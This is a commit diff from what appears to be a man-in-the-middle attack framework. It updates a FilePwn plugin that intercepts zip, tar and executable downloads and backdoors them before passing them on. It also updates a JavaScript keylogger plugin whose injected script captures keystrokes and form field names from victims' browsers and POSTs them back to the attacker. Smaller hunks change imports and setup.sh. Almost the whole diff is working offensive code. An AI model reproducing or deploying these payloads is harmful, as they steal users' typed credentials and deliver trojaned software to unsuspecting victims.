@ -252,24 +499,43 @@ class FilePwn(Plugin):
|
|||
shutil.rmtree(tmpDir)
|
||||
|
||||
with open(tmpFile, 'rb') as f:
|
||||
aZipFile = f.read()
|
||||
tempZipFile = f.read()
|
||||
os.remove(tmpFile)
|
||||
|
||||
if wasPatched is False:
|
||||
print "[*] No files were patched forwarding original file"
|
||||
return aZipFile
|
||||
else:
|
||||
return tempZipFile
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
|
||||
content_header = request.client.headers['Content-Type']
|
||||
client_ip = request.client.getClientIP()
|
||||
|
||||
if content_header in self.zipMimeTypes:
|
||||
logging.info("%s Detected supported zip file type!" % request.client.getClientIP())
|
||||
bd_zip = self.zipGrinder(data)
|
||||
|
||||
if self.bytes_have_format(data, 'zip'):
|
||||
logging.info("%s Detected supported zip file type!" % client_ip)
|
||||
bd_zip = self.zip_files(data)
|
||||
if bd_zip:
|
||||
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
|
||||
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
return {'request': request, 'data': bd_zip}
|
||||
|
||||
else:
|
||||
for tartype in ['gz','bz','tar']:
|
||||
if self.bytes_have_format(data, tartype):
|
||||
logging.info("%s Detected supported tar file type!" % client_ip)
|
||||
bd_tar = self.tar_files(data)
|
||||
if bd_tar:
|
||||
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
return {'request': request, 'data': bd_tar}
|
||||
|
||||
|
||||
elif content_header in self.binaryMimeTypes:
|
||||
logging.info("%s Detected supported binary type!" % request.client.getClientIP())
|
||||
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
||||
if self.bytes_have_format(data, bintype):
|
||||
logging.info("%s Detected supported binary type!" % client_ip)
|
||||
fd, tmpFile = mkstemp()
|
||||
with open(tmpFile, 'w') as f:
|
||||
f.write(data)
|
||||
|
@ -279,9 +545,9 @@ class FilePwn(Plugin):
|
|||
if patchb:
|
||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
||||
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
||||
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
|
||||
logging.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
return {'request': request, 'data': bd_binary}
|
||||
|
||||
else:
|
||||
logging.debug("%s File is not of supported Content-Type: %s" % (request.client.getClientIP(), content_header))
|
||||
logging.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
|
||||
return {'request': request, 'data': data}
|
|
@ -2,7 +2,6 @@ from plugins.plugin import Plugin
|
|||
from plugins.Inject import Inject
|
||||
import logging
|
||||
|
||||
|
||||
class jskeylogger(Inject, Plugin):
|
||||
name = "Javascript Keylogger"
|
||||
optname = "jskeylogger"
|
||||
|
@ -13,14 +12,19 @@ class jskeylogger(Inject, Plugin):
|
|||
def initialize(self, options):
|
||||
Inject.initialize(self, options)
|
||||
self.html_payload = self.msf_keylogger()
|
||||
|
||||
print "[*] Javascript Keylogger plugin online"
|
||||
|
||||
def sendPostData(self, request):
|
||||
#Handle the plugin output
|
||||
if 'keylog' in request.uri:
|
||||
keys = request.postData.split(",")
|
||||
|
||||
raw_keys = request.postData.split("&&")[0]
|
||||
keys = raw_keys.split(",")
|
||||
del keys[0]; del(keys[len(keys)-1])
|
||||
|
||||
input_field = request.postData.split("&&")[1]
|
||||
|
||||
nice = ''
|
||||
for n in keys:
|
||||
if n == '9':
|
||||
|
@ -33,9 +37,14 @@ class jskeylogger(Inject, Plugin):
|
|||
try:
|
||||
nice += n.decode('hex')
|
||||
except:
|
||||
logging.warning("%s ERROR decoding char %s" % (request.client.getClientIP(), n))
|
||||
logging.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
|
||||
|
||||
logging.warning("%s [%s] Keys: %s" % (request.client.getClientIP(), request.headers['host'], nice))
|
||||
#try:
|
||||
# input_field = input_field.decode('hex')
|
||||
#except:
|
||||
# logging.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
|
||||
|
||||
logging.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
|
||||
|
||||
def msf_keylogger(self):
|
||||
#Stolen from the Metasploit module http_javascript_keylogger
|
||||
|
@ -43,7 +52,7 @@ class jskeylogger(Inject, Plugin):
|
|||
payload = """<script type="text/javascript">
|
||||
window.onload = function mainfunc(){
|
||||
var2 = ",";
|
||||
|
||||
name = '';
|
||||
function make_xhr(){
|
||||
var xhr;
|
||||
try {
|
||||
|
@ -80,30 +89,59 @@ document.onkeydown = function1;
|
|||
}
|
||||
|
||||
}
|
||||
function function2(e){
|
||||
|
||||
function function2(e)
|
||||
{
|
||||
srcname = window.event.srcElement.name;
|
||||
var3 = (window.event) ? window.event.keyCode : e.which;
|
||||
var3 = var3.toString(16);
|
||||
if (var3 != "d"){
|
||||
function3(var3);
|
||||
}
|
||||
}
|
||||
function function1(e){
|
||||
var3 = (window.event) ? window.event.keyCode : e.which;
|
||||
if (var3 == 9 || var3 == 8 || var3 == 13){
|
||||
function3(var3);
|
||||
|
||||
if (var3 != "d")
|
||||
{
|
||||
andxhr(var3, srcname);
|
||||
}
|
||||
}
|
||||
|
||||
function function3(var3){
|
||||
var2 = var2 + var3 + ",";
|
||||
function function1(e)
|
||||
{
|
||||
srcname = window.event.srcElement.name;
|
||||
id = window.event.srcElement.id;
|
||||
|
||||
var3 = (window.event) ? window.event.keyCode : e.which;
|
||||
if (var3 == 9 || var3 == 8 || var3 == 13)
|
||||
{
|
||||
andxhr(var3, srcname);
|
||||
}
|
||||
else if (var3 == 0)
|
||||
{
|
||||
|
||||
text = document.getElementById(id).value;
|
||||
if (text.length != 0)
|
||||
{
|
||||
andxhr(text.toString(16), srcname);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function andxhr(key, inputName)
|
||||
{
|
||||
if (inputName != name)
|
||||
{
|
||||
name = inputName;
|
||||
var2 = ",";
|
||||
}
|
||||
|
||||
var2= var2 + key + ",";
|
||||
|
||||
xhr.open("POST", "keylog", true);
|
||||
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
|
||||
xhr.send(var2);
|
||||
xhr.send(var2 + '&&' + inputName);
|
||||
|
||||
if (var3 == 13 || var2.length > 3000)
|
||||
if (key == 13 || var2.length > 3000)
|
||||
{
|
||||
var2 = ",";
|
||||
}
|
||||
}
|
||||
</script>"""
|
||||
|
||||
return payload
|
|
@ -20,11 +20,7 @@ from base64 import b64decode
|
|||
from urllib import unquote
|
||||
import binascii
|
||||
import random
|
||||
|
||||
try:
|
||||
from configobj import ConfigObj
|
||||
except:
|
||||
sys.exit('[-] configobj library not installed!')
|
||||
|
||||
|
||||
class Spoof(Plugin):
|
||||
|
|
1
setup.sh
1
setup.sh
|
@ -6,6 +6,7 @@ fi
|
|||
|
||||
apt-get install python-scapy python-dns python-pip msgpack-python python-nfqueue python-imaging -y
|
||||
apt-get install python-twisted-web python-dnspython python-requests python-configobj python-pefile -y
|
||||
pip install pyyaml ua-parser user-agents
|
||||
git submodule init
|
||||
git submodule update
|
||||
cd libs/bdfactory/ && ./install.sh
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue